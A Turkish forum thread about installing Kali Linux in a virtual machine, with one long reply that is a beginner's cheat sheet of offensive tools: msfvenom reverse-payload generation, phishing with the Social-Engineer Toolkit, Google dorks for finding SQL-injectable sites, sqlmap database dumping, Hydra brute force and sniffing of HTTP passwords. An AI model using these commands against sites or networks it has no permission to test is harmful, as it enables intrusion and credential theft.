Çözüldü Kali Linux nasıl kurulur?
- Konuyu başlatan NightWist
- Başlangıç Tarihi
- Mesaj 14
- Görüntüleme 2B
Bu konu çözüldü olarak işaretlenmiştir. Çözülmediğini düşünüyorsanız konuyu rapor edebilirsiniz.
Çözüm
1-) VMware kullaniyorsan bunu, VirtualBox kullaniyorsan bunu indir.
2-) Indirdigin dosyayi sanal makine uzerine ekle.
3-) Sanal makine ayarlarini sistemine gore yap. Benim tavsiyem en az 2GB bellek vermen. Islemci kisminda 2 cekirdek secili olsun.
4-) Islemcinin sanallastirma destegi oldugunu, ve BIOS ayarlarindan da sanallastirmayi actigini varsayiyorum. Ekledigin sistemi baslatabilirsin.
Zaten bu sanal makine imajlari kurulum gerektirmiyor, sistemi baslattigin zaman Xfce masaustu ortami seni karsiliyor.
2-) Indirdigin dosyayi sanal makine uzerine ekle.
3-) Sanal makine ayarlarini sistemine gore yap. Benim tavsiyem en az 2GB bellek vermen. Islemci kisminda 2 cekirdek secili olsun.
4-) Islemcinin sanallastirma destegi oldugunu, ve BIOS ayarlarindan da sanallastirmayi actigini varsayiyorum. Ekledigin sistemi baslatabilirsin.
Zaten bu sanal makine imajlari kurulum gerektirmiyor, sistemi baslattigin zaman Xfce masaustu ortami seni karsiliyor.
KS
KS
NightWist
Kilopat
- Katılım
- 16 Mayıs 2019
- Mesajlar
- 6.903
- Makaleler
- 2
- Çözümler
- 41
Eğer siber güvenlik ile ilgileniyor iseniz giriş seviyesi kendi yaptığım bir özet.
Kali Linux.
Metasploit-Framework ile penetrasyon testi:
Msfconsole >>> metasploit çalıştırır.
Show (payloads-exploits) >>> payload veya exploitleri görüntüler.
Msfvenom -p (payload adı) lhost=(IP adresiniz) lport=(herhangi bir 4 haneli sayı girin) -f (format) > (dosyaadi).(format)
Search (kelime) >>> aramak istediğiniz kelimeyi girin.
Use (exploit-payload adı)>>> exploit veya payloada girer.
Show options >>> ayarları görüntüler.
Run >>> tarama yapar.
Bağlantı kurulduğunda meterpreter konsolu açılır.
Help >>> yapabileceklerinizi buraya bakarak yapabilirsiniz.
Maltego ile sorgu;
Maltego >>> maltegoyu çalıştırır.
Sosyal mühendislik.
Setoolkit >>> sosyal mühendislik kitini çalıştırır.
Phishing vb yapabilirsiniz.
Site zaafiyet taraması:
1-)fierce ile keşif yapma;
Fierce -h >>> yardım almak için kullanılır.
Fierce --domain (sitealanadi) >>> site IP keşfi yapmak için kullanılır.
2-)wapiti ile tarama;
Wapiti -u (sitelinki) >>> XSS veya SQL açığı bulursa bildirecektir.
3-)owaspzap;
Zaproxy >>> ile grafiksel bir arayüz çıkar buradan linki girip tarama yapabilirsiniz.
4-)dirb ile admin panel bulma;
Dirb (sitelinki) >>> admin panel bulmak için kullanılır genelde.
5-)nmap ile site zaafiyet taraması yapma;
İlk önce site IP adresini buluyoruz. Bunun için ipsorgu.com a girip linki yapıştırıyoruz ve IP adresini kopyalıyoruz. Ardından.
Nmap (sitelinki) >>> genel tarama yapar.
Nmap -SS (sitelinki) >>> log kayıtlarına takılmadan tarama yapar.
Nmap -o -SS (sitelinki) >>> log kayıtlarına takılmadan, OS sistemini öğrenerek tarama yapar.
Nmap -o -a -SS (sitelinki) >>> log kayıtlarına takılmadan, OS sistemini öğrenerek, işletim sistemini öğrenmeye çalışarak tarama yapar.
Nmap -o -a -SS -il (dosya).txt >>> log kayıtlarına takılmadan, OS sistemini öğrenerek, işletim sistemini öğrenmeye çalışarak, çoklu IP taraması yapar.
6-) whois ile site bilgilerini öğrenme;
Whois (sitealanadı.com) >>> site ile ilgili dökümleri önünüze sunar.
Wordlist oluşturma.
1-)normal wordlist oluşturma;
Crunch (min hane) (Max hane) (wordlistte geçecek karakterler) -o (wordlistadi).txt
Örnek;
Crunch 8 8 1234567890abcdefg -o liste.txt
2-)sözlük (site) wordlisti oluşturma;
Cewl -d (kaç katman tarıyacağını girin) -m (kaç haneli olacağını girin) (site linki) -w (wordlist adı)
Örnek;
Cewl -d 3 -m 8 http://www.alphaonenow.org/info.php?id=131 -w liste.
3-) kişiye yönelik wordlist oluşturma;
İlk önce cupp aracını indiriyoruz.
Apt install cupp.
Ardından.
Cupp -i
Sonra gereken bilgileri veriyoruz ve wordlist hazır.
Bruteforce saldırısı yapma.
1-)Hydra ile SSL destekli sitelere saldırma;
Hydra -h >>> 4 farklı seçenek vardır uygulayabilirsiniz.
(Başka araçlarda var GitHub'ta mevcut)
Ağ izleme.
1-) Wireshark ile ağ izleme;
Wireshark >>> programı açar istediğiniz ağı izleyebilirsiniz eğer HTTP ise follow/TCP stream diyerek kişinin şifrelerini ve adlarını görebilirsiniz(detaylı adli bilişim aracıdır vaktinizi alabilir)
2-)kismet ile ağınızda kim var kim yok kontrol edin;
Kismet -c (ağ geçidinizi yazın örnek: WLAN0, ETH0) >>> bir link verecektir tarayıcınızda açın Linux kullanıcı adınızı şifrenizi girin (root geçerlidir)
3-) ettercap ile ağ izleme:
Ettercap -g >>> ettercapı başlatır.
Site sömürgecilik.
1-)sqlmap ile site sömürgesi;
Sqlmap -u (sitelinki) --dbs >>> sitenin databasesini araştırır.
Sqlmap -u (sitelinki) -d (database adı) --tables
>>> Sitenin tablolarını araştırır.
Sqlmap -u (sitelinki) -d (database adı) -t (tablo adı) --columns >>> sitenin columnlarını araştırır.
Sqlmap -u (sitelinki) -d (database adı) -t (tablo adı) -c (column adı) --dump >>> size içeriği veya sonucu gösterir.
Bu sadece SQL açıklı sitelerde geçerlidir.
SQL açıklı site nasıl bulunur?
Google'da dork aratarak bulabilirsiniz.
Dorkları kendiniz yapsanız daha etkili sonuç alırsınız.
Hazır dorklar;
İnurl: Staff_id=
İnurl: PHP? _id=
İnurl: None_id=
İnurl: Me_id=
İnurl: Login? _id=
Sitede SQL açığı olduğunu nasıl anlarız?
Site linkinin sonuna (') işaretini koyarız eğer varsa;
Mysql_ ifadesi geçen bir hata alırız.
Bilgisayarınızı bir web sunucusu yapın!
Service Apache2 start-stop-restart >>> Apache2 (web) sunucusunu başlat-durdur-yenidenbaşlat
Bilgisayarınızın IP adresi sunucunuzun adresidir. IP adresinizi tarayıcıya girin ve entera basın. Debian sitesi gelecektir.
/var/www/html >>> buraya HTML dosyanızı atın ve tarayıcıya.
İp adresiniz/(dosyanizin adi).html olarak aratın. Siteniz karşınıza gelecektir.
Örnek;
192.168.0.1/login.html
Kali Linux genel komutlar:
Shutdown -h (şimdi-Now, saat-{örneğin. 21:00})>>>
Bilgisayarı kapatır.
Shutdown -r (şimdi-Now, saat-{örneğin. 20:00})>>> bilgisayarı yeniden başlatır.
Ls >> dizin içeriğini görüntüler.
CD (klasör) >> klasöre girer.
CD. >> klasörden çıkar.
Sudo >>> root değilken root işlem yapmayı sağlar.
Passwd (kullanıcı adı) >>> şifre değiştirir.
Apt-get Update >> Kali Linux paketlerini yükseltir.
Apt-get upgrade >> Kali Linux paketlerini günceller.
Apt install (paketadı) >> paket yükler.
Apt-get install --reinstall (paket adı) >>> paketi baştan kurar.
Chmod +X (dosyaadi) >> dosyaya izin verir.
Chown (kullaniciadi) (dosyaismi) >> sahiplik değiştirir.
Chown -r root (dosyaismi) >> root yetkisi verir.
Cp (dosyaadi) (tasinacak dizin) >> dosya kopyalar.
Mv (dosyaadi) (tasinacak dizin) >> dosya taşır.
ZIP (dosyaadi) >> dosyayı arşivler.
Unzip (dosyaadi) >> dosyayı arşivden çıkarır.
Openvpn (dosyaismi) >>> VPN açar.
Kali Linux IP değiştirme.
İfconfig yazın >>> IP adresiniz hakkında bilgilerinizi görüntüler.
Yeni terminal açıp;
CD /etc/network/ >>> dizinine giriyoruz.
Nano interfaces >>> dosyayı düzenleyeceğiz.
&(En alt satıra inin)&
İface (ağ geçidiniz) inet static.
(Tabbasın)address (istediğiniz IP adresi yazın)
(Tabbasın)netmask (ilk terminalde yazanı yaz)
(Tabbasın)broadcast (ilk terminalde yazanı yaz)
(Tabbasın)gateway (modem arayüz ipnizi yazın)
CTRL+X basın sonrabasın ve enterlayın.
Reboot yazın >>> sistemi yeniden başlatır.
İfup (ağ geçidiniz örnek: WLAN0, ETH0) >>> ağ geçidini etkinleştirir (her açılışta yazmanız gerekir)
Not: ETH0 da çalışacaktır WLAN0'da çalıştıramadım ama deneyin.
Websploit.
Apt install websploit >>> websploit aracını kurar.
Websploit >>> websploit aracını çalıştırır.
Show modules >>> tüm modülleri gösterir.
Use (modül adı) >>> modüle girer.
Options >>> ayarları görüntüler.
Help >>> yardım almak için kullanılır.
Set (ayar) >>> ayarları düzenler.
Execute >>> başlatır.
Termineter kullanımı.
Apt install termineter >>> termineteri yükler.
Termineter >>> termineteri başlatır.
Show modules >>> modülleri görüntüler.
Use (modül) >>> modüle girer.
Show options >>> ayarları görüntüler.
Set (ayar) >>> ayar değiştirir.
Help >>> yardım almak için kullanılır.
Run >>> modülü başlatır.
Lynis ile sistem güvenlik taraması.
Git clone (indirme linki)>>> lynis aracını GitHub deposundan indiriyoruz.
/Lynis audit System >>> tarama başlatır.
Wpscan ile WordPress site taraması;
Wpscan --URL (sitelinki.com)
Bu aralar siber güvenliği araştırıyorum giriş yapmak istiyorum hangi Linux'u kullanacağımda karasız kalmıştım Kali kullansam olur mu?
SütaşAyran
Hectopat
- Katılım
- 17 Mart 2020
- Mesajlar
- 1.693
- Makaleler
- 2
- Çözümler
- 2
Daha fazla
- Sistem Özellikleri
- i7 6700 16 GB DDR3 RAM RX 6600 XT 240 GB SSD 1 TB HDD
- Cinsiyet
- Erkek
Size tavsiyem uğraşmak istemezseniz Kali kullanabilirsiniz fakat kendinizi geliştirmek adına saf Debian kullanmanızı tavsiye ederim.
kitty_assassin
Kilopat
Daha fazla
- Cinsiyet
- Erkek
- Meslek
- Bilgisayar Mühendisi
Bilgisayarınıza VirtualBox indirdikten sonra Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution sitesinden Download'a basıp Virtual Machines kısmına basıyorsunuz. Aşağıda 64bit 32 bit seçme yeri var sağ taraftakini indirmeniz gerekiyor dosya uzantısı .ova olacak. Ondan sonra VirtualBox'a giriyorsunuz. Sekmelerden "New" diyip isim kısmına Kali Linux yazın otomatik olarak Linux olarak ayarlayacak sistemi. Linux'u oluşturduktan sonra oluşturduğunuz sistemi açın açılırken sizden dosya seçmenizi isteyecek. Bu noktada .ova uzantılı dosyayı seçmeniz gerekiyor. Artık kullanıma hazır sanal bir işletim sistemine sahipsiniz.
Not : En az 2048 MB ram kullanmanızı tavsiye ederim ve eğer Extension hatası verirse VirtualBox eklenti paketini kurmanız gerekiyor onun için de Downloads – Oracle VM VirtualBox sitesinde ortalara doğru Extension Pack diye bir indirme var onu indirip programda File>Preferenceres>Extensions kısmına gelip sağ kısımdan + işaretine basıp indirdiğiniz dosyayı aktarmanız gerekiyor.
Emre kırkaya
Hectopat
- Katılım
- 29 Mart 2020
- Mesajlar
- 85
Benim de işime yarar eyvallah
SütaşAyran
Hectopat
- Katılım
- 17 Mart 2020
- Mesajlar
- 1.693
- Makaleler
- 2
- Çözümler
- 2
Daha fazla
- Sistem Özellikleri
- i7 6700 16 GB DDR3 RAM RX 6600 XT 240 GB SSD 1 TB HDD
- Cinsiyet
- Erkek
Son düzenleyen: Moderatör:
